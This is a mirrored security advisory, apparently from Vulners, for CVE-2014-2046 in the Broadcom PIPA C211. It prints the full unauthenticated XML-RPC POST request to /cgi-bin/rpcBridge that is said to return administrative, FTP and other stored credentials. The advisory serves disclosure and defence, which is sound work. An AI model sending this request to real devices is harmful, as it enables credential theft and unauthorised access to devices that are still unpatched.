Vulners
Lucene search
Broadcom PIPA C211 - Sensitive Information Disclosure
| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
 | Broadcom PIPA C211 Information Disclosure Vulnerability | 14 May 201400:00 | – | zdt |
 | CVE-2014-2046 | 14 May 201400:55 | – | attackerkb |
 | CVE-2014-2046 | 14 May 201400:00 | – | circl |
 | CVE-2014-2046 | 14 May 201400:00 | – | cve |
 | CVE-2014-2046 | 14 May 201400:00 | – | cvelist |
 | Broadcom PIPA C211 - Sensitive Information Disclosure | 14 May 201400:00 | – | exploitpack |
 | CVE-2014-2046 | 14 May 201400:55 | – | nvd |
 | Broadcom PIPA C211 Information Disclosure | 13 May 201400:00 | – | packetstorm |
 | Design/Logic Flaw | 14 May 201400:55 | – | prion |
 | CVE-2014-2046 - Unauthenticated Credential And Configuration Retrieval In Broadcom Ltd PIPA C211 | 15 May 201400:00 | – | securityvulns |
10
Vulnerability title: Unauthenticated Credential And Configuration
Retrieval In Broadcom Ltd PIPA C211
CVE: CVE-2014-2046
Vendor: Broadcom Ltd
Product: PIPA C211
Affected version: Soft Rev: SR1.1, HW Rev: PIPA C211 rev2
Fixed version: N/A
Reported by: Jerzy Kramarz
Details:
By sending the following request to the BROADCOM PIPA C211 web interface it is possible to retrieve complete system configuration including administrative credentials, SMTP community strings, FTP upload credentials and all other system user credentials:
POST /cgi-bin/rpcBridge HTTP/1.1
Host: <IP>
Proxy-Connection: keep-alive
Content-Length: 574
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.102 Safari/537.36
Origin: http://<IP>
Content-Type: text/xml
Accept: */*
DNT: 1
Referer: http://:<IP>/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8,es;q=0.6,pl;q=0.4
<methodCall><methodName>config.getValuesHashExcludePaths</methodName><params><param><value><string>sys</string></value></param><param><value><int>0</int></value></param><param><value><int>0</int></value></param><param><value><array><data><value><string>sys.applications.aptcodec.horizonnextgen.status</string></value><value><string>sys.applications.aptcodec.horizonnextgen.configuration</string></value></data></array></value></param></params></methodCall>
Further details at:
https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2046/
Copyright:
Copyright (c) Portcullis Computer Security Limited 2014, All rights
reserved worldwide. Permission is hereby granted for the electronic
redistribution of this information. It is not to be edited or altered in
any way without the express written consent of Portcullis Computer
Security Limited.
Disclaimer:
The information herein contained may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are NO warranties, implied or otherwise, with regard to this information
or its use. Any use of this information is at the user's risk. In no
event shall the author/distributor (Portcullis Computer Security
Limited) be held liable for any damages whatsoever arising out of or in
connection with the use or spread of this information.Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
14 May 2014 00:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 29.7
EPSS0.12322